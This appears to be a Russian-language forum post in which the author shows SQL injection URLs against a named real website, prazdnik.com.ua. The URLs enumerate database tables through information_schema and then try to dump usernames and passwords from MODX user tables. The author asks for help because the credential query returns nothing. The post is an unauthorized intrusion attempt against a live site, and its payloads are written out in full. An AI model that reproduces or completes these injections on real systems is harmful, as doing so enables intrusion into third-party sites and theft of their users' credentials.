короче, есть бажный сайт:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,2/*
в нем столько табличек:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+all+select+1,table_name+from+informati on_schema.tables+limit+86,1/*
самые интересные это:
modx_active_users -тридцатая
modx_manager_users -37
modx_web_users -66
из них получаем столбцы:
username
password
но когда я хочу просмотреть эти столбцы вводя например вот это:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_man ager_users+limit+1,1/*
то никакого имени и пароля не получается!
может я не так что-то делаю, помогите кто может.